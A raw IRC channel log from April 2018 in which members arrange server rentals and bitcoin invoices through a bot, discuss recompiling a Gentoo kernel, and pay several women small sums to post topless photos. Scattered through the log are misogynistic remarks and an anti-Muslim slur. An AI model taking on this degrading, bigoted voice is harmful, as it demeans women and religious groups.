guy did his field study on our (local) school before planting grenade at famous high school. 1802191;1524083096;spyked;ohbutwait, this ain't about me. anyway. 1802192;1524083102;ascii_lander;http://pizarroisp.net/index.php/2018/04/18/rockchips-for-rent/ << if it wasn't clear : these are ~live~, and available immediately 1802193;1524083142;mircea_popescu;ascii_lander, it's not fucking clear because both you and ben_vulpes communicate weirdly. i was going to buy one! am i ? 1802194;1524083146;ascii_lander;spyked: what was the story with grenade 1802195;1524083186;ascii_lander;mircea_popescu: they were racked yesterday and are up & running an' waiting for folx to live in'em 1802196;1524083199;mircea_popescu;ok, so give douchebag his credentials ? 1802197;1524083223;ascii_lander;is mircea_popescu buying the fella's subscription ? 1802198;1524083232;mircea_popescu;yeah. that was the idea. 1802199;1524083234;ascii_lander;( contact ben_vulpes ) 1802200;1524083240;mircea_popescu;aite. 1802201;1524083281;ascii_lander;( see also article, there are 2 subscription variants ) 1802202;1524083359;spyked;ascii_lander, http://archive.is/4pSLb ; guy planted grenades in cismigiu park and at one of the highschools in town, I have no idea what he was going to do with them, whether there was any motive or whether the guy was sane. but he was recently bailed out. 1802203;1524083516;mircea_popescu;ascii_lander, you're ever the one that sold me on it in the firtst place! http://btcbase.org/log/2018-04-03#1792508 <<->> http://btcbase.org/log/2018-04-03#1792516 etc! 1802204;1524083516;a111;Logged on 2018-04-03 18:23 mircea_popescu: douchebag i'll get you a sever once the pizarro folk unwrap their heads enough to actually have one on offer. so you can tinker on gentoo, trb etc and get out of the "vps" bs hell. 1802205;1524083516;a111;Logged on 2018-04-03 18:25 asciilifeform: mircea_popescu: if all he needs is standard unix userland, no reason he couldn't arm. 1802206;1524083530;spyked;but the (prolly not too important) fact that he was hired by private security firm to guard school never made the press. we just saw the news back then (was it 2001?) and luled. 1802207;1524083579;ben_vulpes;i will point out that this rockchip will be a poor production trb host; but will be a fine trb experimentation platform for trinque's audit 1802208;1524083665;douchebag;!!up brooklyn 1802209;1524083666;deedbot;brooklyn voiced for 30 minutes. 1802210;1524083701;brooklyn;!!register http://p.bvulpes.com/pastes/i9WcJ/?raw=true 1802211;1524083703;deedbot;EE7CD6CC74BC755446E67A772F0265A9175DB8C4 registered as brooklyn. 1802212;1524083715;brooklyn;tits 1802213;1524083770;mircea_popescu;lol. brooklyn 5bc94d24. half hour. 1802214;1524084215;brooklyn;https://i.imgur.com/Nbnk8RU.png 1802215;1524084393;mircea_popescu;brooklyn, take off all your clothes ; and that silly rainbow nonsense. 1802216;1524084421;brooklyn;ok 1802217;1524084774;ascii_lander;ben_vulpes: absolutely unusable for trb, cannot (as presently configed) hold the bloxx 1802218;1524084785;ascii_lander;unless you only want to build and smoketest etc 1802219;1524084811;*;ascii_lander has maybe 20min of battery remaining 1802220;1524084871;brooklyn;https://i.imgur.com/ZsJpGlT.jpg 1802221;1524084914;brooklyn;is this fine? 1802222;1524084946;mircea_popescu;spyked, apparently you have no comments ? anyway, "the smiling girl i saw today bewitched my soul entirely ; another line goes in a diary that's read by me, and Mr. Sorrowly." 1802223;1524085138;mircea_popescu;(and no, it's not good. it may shock in the sense of "omfg, i had no expectation anything can be done", but good it can't be, because romanian is a highly cultured language, and when you say "tramvai" ie "tramcar" you don't merely say that, but also include by reference "aiurea-n tramvai", which is a typically romanian construction, and susai-s not merely Sonchus arvensis but also all the references in all the "new realism" c 1802224;1524085138;mircea_popescu;ommie novels as to the hardness of rural life, and so going forever, everything is a list of include-by-reference fifty items long.) 1802225;1524085225;mircea_popescu;anyway ; translation is knowing when to take liberties. which is why it's exactly betrayal. 1802226;1524085371;mircea_popescu;also, https://www.youtube.com/watch?v=_hkjo-p_bXU 1802227;1524085374;brooklyn;so can I re -do it? 1802228;1524085402;mircea_popescu;brooklyn, yes. 1802229;1524085473;mircea_popescu;!!up brooklyn 1802230;1524085473;deedbot;brooklyn voiced for 30 minutes. 1802231;1524085648;spyked;thetarpit comments are still wip. :( that functionality screams to be added, there are one or two things that I still need to figure out. 1802232;1524085679;mircea_popescu;aite. 1802233;1524085894;ben_vulpes;http://pizarroisp.net/index.php/2018/04/18/rockchips-for-rent/ << updated with setup fee, consumable drive pricing 1802234;1524085965;mircea_popescu;ben_vulpes, so then, invoice me for 75 * 4 + 50 an' send the boy his details ? 1802235;1524086028;ben_vulpes;mircea_popescu: will do 1802236;1524086045;ben_vulpes;!~ticker --market all 1802237;1524086170;mircea_popescu;incidentally ben_vulpes : the "The tangibles line looks healthier than it has any right to due to the deterioration of the USD/BTC price. " comment suggests a pretty fine price signal : when btc goes down, incentive to buy pizarro equity goes up. when it's eventually listed you can almost judge btc usd pair by its share price. 1802238;1524086365;ben_vulpes;heh well the amount of usd involved is rather small, but i see the point 1802239;1524086384;ben_vulpes;ah lost shinohai's bot because he wants to look at logs some more instead of providing a useful tool 1802240;1524086448;ben_vulpes;i do not understand the behavior; he runs a perfectly fine bot for god only knows how long, gets threatened with defrocking, system loses all semblance of reliability in parallel with a few hissy fits 1802241;1524086490;ben_vulpes;i would expect that if he valued his seat he'd make things work better, so i struggle to reconcile the demonstrated behavior with the implied desires of the complaints he voiced. 1802242;1524086547;ben_vulpes;perhaps they fed him some Very Bad Drugs in the white building. how'd i know? 1802243;1524086860;ben_vulpes;!!invoice mircea_popescu 0.04344809 1 rockchip @ pizarro, april 19 2018 -- april 19 2019 1802244;1524086866;deedbot;Get your OTP: http://p.bvulpes.com/pastes/ypxr6/?raw=true 1802245;1524086908;spyked;mircea_popescu, re poem, the enclosed rhyme and the meter dun make it any easier, but I fixated on them in my review. any further attempts at this might make my head explode, so I'll leave it to the ro-en professionals. ah, but perhaps I should add the poem title in there! ftr: https://youtu.be/KxTNpEwN3ck?t=1m24s 1802246;1524087075;ben_vulpes;!!v F695C0C8522BAFCA448C6D4DE5882C91EE28E248FD337EAF25C34BDC539BB85D 1802247;1524087078;deedbot;Invoiced mircea_popescu 0.04344809 << 1 rockchip @ pizarro, april 19 2018 -- april 19 2019 1802248;1524087104;ben_vulpes;douchebag: http://pizarroisp.net/index.php/pizarro-good-neighbor-policy/ pls to review, object if you're going to 1802249;1524087158;douchebag;All good with me 1802250;1524087560;douchebag;!!up Sandiiiiii 1802251;1524087560;deedbot;Sandiiiiii voiced for 30 minutes. 1802252;1524087566;Sandiiiiii;titties 1802253;1524087794;douchebag;last bitch flaked because I was too mean 1802254;1524087973;mircea_popescu;ben_vulpes, how long is it going to stay small. 1802255;1524088023;mircea_popescu;!!received-invoices 1802256;1524088028;deedbot;http://p.bvulpes.com/pastes/8GjuJ/?raw=true 1802257;1524088078;trinque;ben_vulpes: hey even the antibiotics can be Very Bad Drugs; maybe he isn't pooping so well lately 1802258;1524088087;ben_vulpes;mircea_popescu: left me crystal ball on the ghostly pirate ship 1802259;1524088106;ben_vulpes;trinque: "you're so full of shit your eyes are brown!" 1802260;1524088162;mircea_popescu;ben_vulpes, ok, but by its nature, it's one of the few republican concerns that naturally accumulates large piles of pricy and valuable capital goods. 1802261;1524088182;ben_vulpes;mircea_popescu: oh oh 1802262;1524088191;ben_vulpes;mircea_popescu: i thought you were talking about the "good neighbor policy" 1802263;1524088246;ben_vulpes;mircea_popescu: it expands somewhat this month! 1802264;1524088278;mircea_popescu;no, you said "oh, but pizarro book is small" in the sense of, "how much trading can it take". well... 1802265;1524088369;Sandiiiiii;where do I get this code? 1802266;1524088448;ben_vulpes;sorry, i don't follow 1802267;1524088459;mircea_popescu;Sandiiiiii, 182a6c81. you got half hour. 1802268;1524088520;mircea_popescu;ben_vulpes, http://btcbase.org/log/2018-04-18#1802237 -> http://btcbase.org/log/2018-04-18#1802238 -> http://btcbase.org/log/2018-04-18#1802254 -> http://btcbase.org/log/2018-04-18#1802262 -> http://btcbase.org/log/2018-04-18#1802264 1802269;1524088520;a111;Logged on 2018-04-18 21:16 mircea_popescu: incidentally ben_vulpes : the "The tangibles line looks healthier than it has any right to due to the deterioration of the USD/BTC price. " comment suggests a pretty fine price signal : when btc goes down, incentive to buy pizarro equity goes up. when it's eventually listed you can almost judge btc usd pair by its share price. 1802270;1524088520;a111;Logged on 2018-04-18 21:19 ben_vulpes: heh well the amount of usd involved is rather small, but i see the point 1802271;1524088520;a111;Logged on 2018-04-18 21:46 mircea_popescu: ben_vulpes, how long is it going to stay small. 1802272;1524088520;a111;Logged on 2018-04-18 21:49 ben_vulpes: mircea_popescu: i thought you were talking about the "good neighbor policy" 1802273;1524088520;a111;Logged on 2018-04-18 21:51 mircea_popescu: no, you said "oh, but pizarro book is small" in the sense of, "how much trading can it take". well... 1802274;1524088544;ben_vulpes;ah. 1802275;1524088578;mircea_popescu;trinque, here's a thing : i have a list of invoices, and they're all "invoice #" 1. this is silly, could the # actually count them ? 1802276;1524088591;ben_vulpes;mircea_popescu: they're unique per invoicer 1802277;1524088606;mircea_popescu;re the whole "policy" w/e, it's not somthing i'd have ever done myself, but you get to run your own ship, so. 1802278;1524088673;mircea_popescu;!!pay-invoice ben_vulpes 1 1802279;1524088678;deedbot;Get your OTP: http://p.bvulpes.com/pastes/uy3lm/?raw=true 1802280;1524088686;ben_vulpes;yeah i may take it down, it's a bit silly. 1802281;1524088718;mircea_popescu;how's polyamory Framedragger ? 1802282;1524088752;trinque;mircea_popescu: the count is between you and ben_vulpes, so you could call it ben_vulpes-1 1802283;1524088862;ben_vulpes;mircea_popescu: i fat fingered that invoice, billed for 4 months instead of 12. 1802284;1524088874;mircea_popescu;trinque, it's not practical to just have a count ? 1802285;1524088881;mircea_popescu;ben_vulpes, no, that's what i asked for, a quarter. 1802286;1524088904;ben_vulpes;quarter is 3 months, you bought 4 1802287;1524088937;ben_vulpes;and i labeled it twelve! 1802288;1524088955;trinque;mircea_popescu: that reveals your inbound invoice count to ben_vulpes 1802289;1524088961;mircea_popescu;lmao. 1802290;1524088964;trinque;or otherwise you have two separate numbers to identify the invoice 1802291;1524088986;mircea_popescu;trinque, ha, i see your point. ok, ima just make an index out of first two fields. 1802292;1524088999;mircea_popescu;no changes on your end required. 1802293;1524089010;ben_vulpes;anyways, have the fourth month at the quarterly rate or i'll refund a month. your option. 1802294;1524089014;trinque;alrighty 1802295;1524089016;mircea_popescu;ben_vulpes, so i guess i get 4 months at 75 each, what can i tell you. 1802296;1524089100;mircea_popescu;!!pay brooklyn 0.02 1802297;1524089105;deedbot;Get your OTP: http://p.bvulpes.com/pastes/GTnJA/?raw=true 1802298;1524089463;ben_vulpes;ey trinque under what conditions will deedbot refuse a reg'd key wallet functions? 1802299;1524089484;ben_vulpes;theoretical exercise, no fuzzing at work 1802300;1524089507;ben_vulpes;do ratings factor at all? 1802301;1524089600;mircea_popescu;going through my list here... sooo asciilifeform i don't see a phuctor up ? we get what, two boxes hosted ? 1802302;1524089624;mircea_popescu;ben_vulpes, also, i take it from diana_coman smg box is all up, how did that go payment wise ? 1802303;1524089670;trinque;ben_vulpes: no such rules exist today; you've got the key, you can move the money 1802304;1524089691;mircea_popescu;re http://btcbase.org/log/2018-04-18#1802298 , i take http://btcbase.org/log/2018-02-17#1784430 to mean "never". 1802305;1524089691;a111;Logged on 2018-04-18 22:11 ben_vulpes: ey trinque under what conditions will deedbot refuse a reg'd key wallet functions? 1802306;1524089691;a111;Logged on 2018-02-17 19:01 asciilifeform: what will trinque do ? 1802307;1524089845;trinque;aha, don't have any interest in the thing being a box that can snap shut on people. why'd they use it if so? 1802308;1524089860;ben_vulpes;mircea_popescu: hadn't yet, last discussion was re an entirely different box, but we settled on a 1.2x purchase price per annum (with guaranteed spare), or a tidy .48 1802309;1524089864;ben_vulpes;trinque: ty 1802310;1524089986;douchebag;!!up Sandiiiiii 1802311;1524089986;deedbot;Sandiiiiii voiced for 30 minutes. 1802312;1524090018;ben_vulpes;!!invoice adlai .03413779 RK @ P april 19 2018 - july 19 2018 1802313;1524090023;deedbot;Get your OTP: http://p.bvulpes.com/pastes/IkEnV/?raw=true 1802314;1524090023;Sandiiiiii;https://i.imgur.com/H84g7ot.jpg 1802315;1524090023;ben_vulpes;mircea_popescu: if you're amenable i'll invoice 1802316;1524090041;ben_vulpes;lol titception 1802317;1524090090;trinque;ahahah check out brian mccuckles 1802318;1524090113;diana_coman;!!pay-invoice lobbes 1 1802319;1524090117;deedbot;Get your OTP: http://p.bvulpes.com/pastes/Tc1im/?raw=true 1802320;1524090170;ben_vulpes;!!v 1C94FD901D6C3A87EC76B84A4EBFCA4E59C3DF12CD6F4B538F3E8265815E5BE8 1802321;1524090173;deedbot;Invoiced adlai .03413779 << RK @ P april 19 2018 - july 19 2018 1802322;1524090199;trinque;!!up ascii_lander 1802323;1524090201;deedbot;ascii_lander voiced for 30 minutes. 1802324;1524090228;mircea_popescu;ben_vulpes, iirc was yeah, you get 20% margin, but the original figure didn't iirc include fgs. 1802325;1524090277;ascii_lander;http://btcbase.org/log/2018-04-18#1802301 << box flew 'unarmed' (naked gentoo), will enphuctorate it when i get back to cockpit 1802326;1524090277;a111;Logged on 2018-04-18 22:13 mircea_popescu: going through my list here... sooo asciilifeform i don't see a phuctor up ? we get what, two boxes hosted ? 1802327;1524090292;mircea_popescu;a cool. but we're paying them for hosting 2 items for us yes ? 1802328;1524090294;diana_coman;ascii_lander, as far as I can see there is no support for iptables ? do I need to recompile the kernel? 1802329;1524090318;ascii_lander;diana_coman: you may have to; it takes about 7min on this box to compile 1802330;1524090331;ascii_lander;use the config from zcat /proc/config.gz 1802331;1524090345;ascii_lander;and change as needed 1802332;1524090354;mircea_popescu;http://btcbase.org/log/2018-04-18#1802314 << bwaahaha. there you go ascii_lander . 1802333;1524090354;a111;Logged on 2018-04-18 22:20 Sandiiiiii: https://i.imgur.com/H84g7ot.jpg 1802334;1524090361;ascii_lander;make sure to mount /boot prior to using genkernel, if you use genkernel 1802335;1524090380;ascii_lander;( genkernel --menuconfig all and then load the above conf as starting point , say ) 1802336;1524090384;diana_coman;I'm sort of noob+ with gentoo, not more, so it will likely take *me* more than that, lol; but still need to figure it out anyway 1802337;1524090396;mircea_popescu;!!pay Sandiiiiii 0.02 1802338;1524090401;deedbot;Get your OTP: http://p.bvulpes.com/pastes/E8TVD/?raw=true 1802339;1524090466;ascii_lander;diana_coman: lemme know if you need a hand , though i will have spotty connectivity for the next 2day 1802340;1524090497;mircea_popescu;Sandiiiiii, sooo... what do you do, college ? 1802341;1524090530;Sandiiiiii;im not smart enough for that 1802342;1524090531;trinque;douchebag: so this girl has parallels open? 1802343;1524090545;ascii_lander;mircea_popescu: we under snsa banner, hosting 1 box plus its spare 1802344;1524090568;ascii_lander;( the spare lives in the rack solely because it is the convenient place to store it, currently, it does not consume current or use the net ) 1802345;1524090576;mircea_popescu;douchebag, is it actually ~you~ talking on irc under their silly names ? 1802346;1524090581;trinque;it totally is. 1802347;1524090595;ascii_lander;when/if rack fills up, spares will get either moved or converted to living boxen 1802348;1524090606;ascii_lander;trinque: i suspected from beginning, recall, lol 1802349;1524090613;mircea_popescu;ascii_lander, so then i don't get it, am i paying for 1 slot ? 1802350;1524090625;ascii_lander;1 1802351;1524090630;mircea_popescu;aite. 1802352;1524090717;ascii_lander;ditto smg 1802353;1524090742;trinque;that's also a visual studio icon at the bottom. 1802354;1524090746;ascii_lander;( smg's spare also is living inside the rack, but unpowered ) 1802355;1524090754;trinque;douchebag: first off, your choice of IDE is unimpressive. 1802356;1524090759;ascii_lander;trinque: lol, vs for crapple! 1802357;1524090771;douchebag;I don't use that I just tell them the link to send 1802358;1524090793;trinque;so how'd she send a screenshot of your desktop 1802359;1524090808;mircea_popescu;douchebag, why not just tell them to use either webirc or kiwi ? 1802360;1524090809;douchebag;I sent them the wrong link 1802361;1524090819;mircea_popescu;not like it dun work on brower/mobile etc. 1802362;1524090847;ascii_lander;mircea_popescu: lol, if he sends them a working chat link, they might find out about the bitcents 1802363;1524090868;ascii_lander;whereas nao they're likely doing the job for the 10bux or whatever he offered'em 1802364;1524090869;mircea_popescu;you think he cares THAT deeply ? 1802365;1524090889;ascii_lander;presumably d00d cares re the 77 ( or how many nao ) * 0.02 1802366;1524090912;mircea_popescu;yeah, because it's totally so likely esl females are autonomous enough they'd do something about it. 1802367;1524090930;mircea_popescu;if you find one in 77 that does, you're ahead of the game because now you know someone worth dating. 1802368;1524090949;ascii_lander;do what. they might start showing up properly, neh, and collect coin instead of him 1802369;1524090952;ben_vulpes;i don't know why he's not asking for the tits under his own name 1802370;1524090958;ascii_lander;^ 1802371;1524090958;ben_vulpes;this is not allowed? 1802372;1524090997;ascii_lander;my understanding is, d00d bamboozled mircea_popescu , but mircea_popescu is such good sport that he dun care 1802373;1524091025;ben_vulpes;i personally admire the dedication to cranking the crank whore crank 1802374;1524091036;trinque;eh I'm not even saying that; tits are tits, I'm just mocking douchebag's elaborate process 1802375;1524091036;ckang;!!up candyas 1802376;1524091037;deedbot;candyas voiced for 30 minutes. 1802377;1524091037;ben_vulpes;in the way that i admire woodcutter ants dedication to the snipsnip 1802378;1524091058;candyas;hi mircea_popescu 1802379;1524091066;mircea_popescu;ckang, is that you ? 1802380;1524091071;ben_vulpes;lol 1802381;1524091086;ckang;who 1802382;1524091092;mircea_popescu;ckang, candyas. 1802383;1524091107;ckang;i brought her in not me tho 1802384;1524091150;mircea_popescu;so candyas is this chick connecting to irc on her phone via your irccloud thing, rather than you yourself bridging over whatever nonsense skype into your own irccloud ? 1802385;1524091185;ckang;nah i make them irccloud and gpg and send a link that takes them in 1802386;1524091185;mircea_popescu;(because that's the other end of this, you folk live sheltered lives, have nfi how braidead the zombies are. THEY.WILL.NOT.USE.ANYTHING.BUT.X. where the x is whatever it is, skype.) 1802387;1524091200;mircea_popescu;candyas, you here to show us your tits ? 1802388;1524091210;ckang;because it lets lets them upload photos easily too 1802389;1524091227;candyas;Yes 1802390;1524091239;mircea_popescu;candyas, 80b874ec. you got half hour. 1802391;1524091316;mircea_popescu;ascii_lander, it can't be $10, either, since one of them is asking for remittance to another one of $30. 1802392;1524091342;ascii_lander;ha 1802393;1524091363;ben_vulpes;mircea_popescu: 0.513333336 with fuckgoats 1802394;1524091378;mircea_popescu;ben_vulpes, can i have a calculation rather than a figure ? 1802395;1524091379;ckang;mircea_popescu: unsure about anythign else but i have a POST request i send to irccloud to make a new account 1802396;1524091385;ben_vulpes;mircea_popescu: 0.51333334 i mean, and yes. 1802397;1524091402;mircea_popescu;ckang, i don't follow ? 1802398;1524091406;ckang;then i can link them with credentials in url 1802399;1524091422;ckang;so its just clicking a link and it joins basically 1802400;1524091438;mircea_popescu;ah ah. so you're not actually running around like a singapore coolie, trying to come up with strings imaginary girls "said" and so on. 1802401;1524091450;ckang;https://www.irccloud.com/irc/freenode/channel/trilema <-- takes me here directly 1802402;1524091458;mircea_popescu;yeah. 1802403;1524091551;Sandiiiiii;whats going on 1802404;1524091586;mircea_popescu;Sandiiiiii, we're just lulzing at your pic. is that your desktop ? 1802405;1524091602;douchebag;thats my desktop 1802406;1524091615;*;ckang hasn't read the log so is a bit confused 1802407;1524091617;*;ascii_lander bbl, walking to food 1802408;1524091631;mircea_popescu;douchebag, so why is she posting your desktop ? 1802409;1524091646;diana_coman;ascii_lander, will do; ftr I used make config/menuconfig etc on the few occasions I compiled gentoo kernels before so genkernel would be new anyway; will look at it all tomorrow morning with fresh eyes 1802410;1524091672;douchebag;I sent her the wrong link to post 1802411;1524091735;mircea_popescu;lol. so basically your process is she sends you the pic in chat and you upload it and send her the link ? 1802412;1524091797;douchebag;she texts me the pic via text, and I send her the link the upload in chat 1802413;1524091824;ben_vulpes;can't in2 imgur themselves even? 1802414;1524091828;ben_vulpes;holy hell my dood 1802415;1524091851;mircea_popescu;basically the evolutionary programming at work here is like so : his cost per unit of computer interaction is like 1/100 theirs. thus all tasks that can be outsourced from them to him WILL be 1802416;1524091853;ckang;i think they force you to DL the app now 1802417;1524091863;mircea_popescu;because otherwise they'd have to be paid trillions bezzlebucks to get off fat ass. 1802418;1524091870;ckang;but you can request the desktop site 1802419;1524091878;ckang;it behaves odd but sorta works 1802420;1524091900;mircea_popescu;what's a desktop site ? 1802421;1524091912;ckang;you know on mobile browsers 1802422;1524091918;ckang;it request the mobile version by default 1802423;1524091919;ben_vulpes;he's unsullied ckang 1802424;1524091933;ben_vulpes;don't cut samson's hair! 1802425;1524091943;mircea_popescu;heh. trilema doesn't EVEN HAVE a mobile version. because the "desktop" version looks perfect on mobile as it is. 1802426;1524091961;ckang;but chrome has a 'desktop site' option which request the regular version 1802427;1524091966;mircea_popescu;i c. 1802428;1524091981;ben_vulpes;mircea_popescu: http://p.bvulpes.com/pastes/NVfBG/?raw=true 1802429;1524092063;douchebag;!!up Sandiiiiii 1802430;1524092064;deedbot;Sandiiiiii voiced for 30 minutes. 1802431;1524092076;Sandiiiiii;https://i.imgur.com/HpigdYG.jpg 1802432;1524092078;mircea_popescu;ben_vulpes, ok, but whence the .4 ? also, 45/18 = 2.5. 1802433;1524092097;douchebag;that's the link I was supposed to send her 1802434;1524092101;mircea_popescu;Sandiiiiii, http://btcbase.org/log/2018-04-18#1802337 << you can only get it once. 1802435;1524092101;a111;Logged on 2018-04-18 22:26 mircea_popescu: !!pay Sandiiiiii 0.02 1802436;1524092135;mircea_popescu;or is this douchebag 's delicate way of asking me not to post his desktop lol. 1802437;1524092207;candyas;https://usercontent.irccloud-cdn.com/file/QHpVR3XM/image.jpg 1802438;1524092223;ben_vulpes;http://logs.bvulpes.com/trilema?d=2018-4-3#325213 1802439;1524092223;mimisbrunnr;Logged on 2018-04-03 19:33 mircea_popescu: ben_vulpes cash or bonds, though for the latter no actual discount was discussed in teh nsa boardroom. but i guess i'll go with .4 off the cuff and hope nobody throws gavels at me. 1802440;1524092239;ben_vulpes;mircea_popescu: and 'twas 36 fg iirc 1802441;1524092265;ben_vulpes;i'll rerun at the cash prices for both 1802442;1524092316;mircea_popescu;ben_vulpes, yes, and there's 18 pairs in 36. 1802443;1524092395;Sandiiiiii;!!balance 1802444;1524092406;Sandiiiiii;!!key Sandiiiiii 1802445;1524092406;deedbot;Not registered. 1802446;1524092439;Sandiiiiii;!!register http://p.bvulpes.com/pastes/hEj6t/?raw=true 1802447;1524092442;deedbot;1DA4C7BDA1BC11211970D175D061AEC1EEBAE00C registered as Sandiiiiii. 1802448;1524092481;douchebag;mircea_popescu: She wasn't registered when you did !!pay Sandiiiiii 1802449;1524092544;mircea_popescu;!!pay candyas 0.02 1802450;1524092549;deedbot;Get your OTP: http://p.bvulpes.com/pastes/wLyoX/?raw=true 1802451;1524092554;mircea_popescu;douchebag, haven't confirmed the batch yet so should be ok anyway. 1802452;1524092609;Sandiiiiii;!!balance 1802453;1524092615;deedbot;http://p.bvulpes.com/pastes/uYgFr/?raw=true 1802454;1524092623;mircea_popescu;isn't it incredible how many chicks sport noserings btw ? 1802455;1524092632;douchebag;yeah ikr 1802456;1524092653;ben_vulpes;mircea_popescu: http://p.bvulpes.com/pastes/d9ljA/?raw=true 1802457;1524092682;mircea_popescu;ben_vulpes, but i am getting TWO fgs yes ? and, same q, whence 3751 ? 1802458;1524092689;mircea_popescu;371* 1802459;1524092700;mircea_popescu;oh, wait, you bought this from nsa didn't you ? 1802460;1524092716;ben_vulpes;ding ding ding 1802461;1524092725;ckang;god a nose ring would drive me nus 1802462;1524092727;ckang;nuts* 1802463;1524092736;mircea_popescu;yeah sorry. sometimes the percolator gets clogged. ok so the deal here is, 0.4752 buys me the box and its hosting till april 18th 2018 ? 1802464;1524092750;mircea_popescu;ckang, i like ziptieing them to walls etc. 1802465;1524092754;ben_vulpes;( http://logs.bvulpes.com/trilema?d=2018-4-18#339047 for posterity) 1802466;1524092756;mimisbrunnr;Logged on 2018-04-18 22:46 ben_vulpes: http://logs.bvulpes.com/trilema?d=2018-4-3#325213 1802467;1524092756;mimisbrunnr;Logged on 2018-04-03 19:33 mircea_popescu: ben_vulpes cash or bonds, though for the latter no actual discount was discussed in teh nsa boardroom. but i guess i'll go with .4 off the cuff and hope nobody throws gavels at me. 1802468;1524092765;ben_vulpes;mircea_popescu: ever rip one out doing that? 1802469;1524092787;ben_vulpes;mircea_popescu: april 18 2019, with spare. 1802470;1524092801;ben_vulpes;"hey, i guess you just bought negative one days!" 1802471;1524092816;ckang;mircea_popescu: i just imagine sneezing 1802472;1524092818;ckang;and ripping it out lol 1802473;1524092861;mircea_popescu;nope. much liek the original nose ring patient (bulls), the girls with them are docile. 1802474;1524092866;mircea_popescu;ben_vulpes, aite, invoice plox. 1802475;1524092895;mircea_popescu;pizarro is actually making some decent sales this month huh. will show green for once, if nominally. 1802476;1524092903;ben_vulpes;VERY NOMINALLY 1802477;1524092909;ckang;girls with gauges and piercings have never done me wrong 1802478;1524092928;mircea_popescu;ben_vulpes, also invoice for snsa's colo, but plox do a special job for me : remainder of q2. 1802479;1524092948;ben_vulpes;separate bills for separate corps or allinone 1802480;1524092955;mircea_popescu;separate plox. 1802481;1524092969;ben_vulpes;comin up 1802482;1524093005;mircea_popescu;ben_vulpes, i know of virtually no start-ups that show green within first few quarters, howsoever nominally. 1802483;1524093064;ckang;!!up sandi3 1802484;1524093064;deedbot;sandi3 voiced for 30 minutes. 1802485;1524093079;ben_vulpes;this is true enough 1802486;1524093110;sandi3;Hey, here for picture 1802487;1524093116;mircea_popescu;sandi3, 14754d23. half hour. 1802488;1524093119;ben_vulpes;anyone else with outstanding pizarro biz, please to queue it up asap, i too will pumpkin shortly 1802489;1524093229;ben_vulpes;!!invoice mircea_popescu .4752 1U april 18 2018 through april 18 2019 1802490;1524093234;deedbot;Get your OTP: http://p.bvulpes.com/pastes/RlMAz/?raw=true 1802491;1524093254;mircea_popescu;put a (s.x box) in there for future disentanglements. 1802492;1524093274;mircea_popescu;(i don't mean redo this one. just, in general.) 1802493;1524093287;ben_vulpes;yup yup 1802494;1524093309;ben_vulpes;eh, a thing worth doing's worth doing correctly, i've not verified it yet 1802495;1524093330;ben_vulpes;!!invoice mircea_popescu .4752 1U server for s.mg april 18 2018 through april 18 2019 1802496;1524093333;deedbot;Get your OTP: http://p.bvulpes.com/pastes/HLqtm/?raw=true 1802497;1524093349;mircea_popescu;cool. 1802498;1524093362;ben_vulpes;!!v 734D2DF6E0F20C78099BE072879E91C8EEA599B21A098C4C0E44762E6443CA81 1802499;1524093365;deedbot;Invoiced mircea_popescu .4752 << 1U server for s.mg april 18 2018 through april 18 2019 1802500;1524093380;ckang;all this server talk has me wanting to build lol 1802501;1524093397;mircea_popescu;lol. 1802502;1524093398;ckang;i really dont need anything else, not at the house anyways 1802503;1524093482;ckang;i built a storage server a while back, a 4u and 2u supermicro 1802504;1524093489;ckang;36 bays, should be good for a while 1802505;1524093506;mircea_popescu;ben_vulpes, also, not to meddle, but you might consider saving on wu extortion by having BingoBoingo take trip to bsas, sell a coin or two, come back. 1802506;1524093540;ben_vulpes;mircea_popescu: been a backburner thought for a bit now; what's the ferry cost again? 1802507;1524093551;mircea_popescu;eh, fiddy bux or something in that vein. 1802508;1524093577;mircea_popescu;lemme fish it out. 1802509;1524093579;mircea_popescu;http://trilema.com/2014/mps-guide-to-boat-travel-from-upon-the-very-boat-in-question/ << here. 1802510;1524093590;ben_vulpes;2 second fishing trip lol 1802511;1524093616;sandi3;https://usercontent.irccloud-cdn.com/file/218ypZJ9/image.jpg 1802512;1524093619;mircea_popescu;hey, sometime google hits. 1802513;1524093653;mircea_popescu;!!pay sandi3 0.02 1802514;1524093656;deedbot;Get your OTP: http://p.bvulpes.com/pastes/6snQZ/?raw=true 1802515;1524093658;mircea_popescu;sooo... what do you do for a living sandi3 ? 1802516;1524093675;sandi3;Work at a bookstore 1802517;1524093693;sandi3;Large chain one 1802518;1524093696;mircea_popescu;i coulda swore. is it exciting, putting your tits out there ? 1802519;1524093713;sandi3;But I don't read many books, before you ask 😀 1802520;1524093741;mircea_popescu;lol. i bet you don't. 1802521;1524093750;sandi3;I do have a bit of an adrenaline rush almost 1802522;1524093766;mircea_popescu;is it your first time publicly exposed ? 1802523;1524093776;sandi3;My heart is beating faster 1802524;1524093790;sandi3;Infront of an audience, yes 1802525;1524093809;mircea_popescu;sandi3, http://trilema.com/2011/mila-publica/ << there. you won't be able to read the text, but they say a reel's worth 1k words lol. 1802526;1524093889;sandi3;LOL 1802527;1524093896;sandi3;I can't read this 1802528;1524093906;sandi3;What language is it in? 1802529;1524093932;mircea_popescu;romanian. 1802530;1524093962;sandi3;Oh, only thing I know about Romania is Gypsies, sorry if offends 1802531;1524094005;mircea_popescu;the two are rather unrelated, but hey. 1802532;1524094021;sandi3;I'm just not sure if thats a good or bad thing in the country 1802533;1524094033;douchebag;!!up Cassidy_ 1802534;1524094033;deedbot;Cassidy_ voiced for 30 minutes. 1802535;1524094045;mircea_popescu;sandi3, what that and which country ? gypsies don't have a country. 1802536;1524094047;sandi3;Oh, I thought Gypsies are roma 1802537;1524094049;Cassidy_;im here fot tits 1802538;1524094063;Cassidy_;for 1802539;1524094063;mircea_popescu;Cassidy_, 439073e1. half hour. 1802540;1524094063;sandi3;Or a had some roots there at some point 1802541;1524094096;mircea_popescu;sandi3, the two are entirely unrelated. ohio calls itself after some indians that used to live there. 1802542;1524094112;mircea_popescu;a buncha brits got some gypsies together some time in the 60s and got them to declare "they are now called roma" 1802543;1524094136;sandi3;AH, sorry, I've been wrong on this for a while then 1802544;1524094137;mircea_popescu;i also got a bunch of brits together and got them to declare it's no longer the uk, it's "muslims rapeshack fuckface factory" 1802545;1524094159;mircea_popescu;inexplicably, nobody goes around asking the idiots living onmthat island anything about their being MRFF. 1802546;1524094161;mircea_popescu;yet. 1802547;1524094236;sandi3;Sorry if I offended you 1802548;1524094260;mircea_popescu;dun worry about it. i'm not an offendable sort. 1802549;1524094275;sandi3;😎 1802550;1524094339;mircea_popescu;i'm just very expressive, which people tend to misinterpret as having been offended whenever 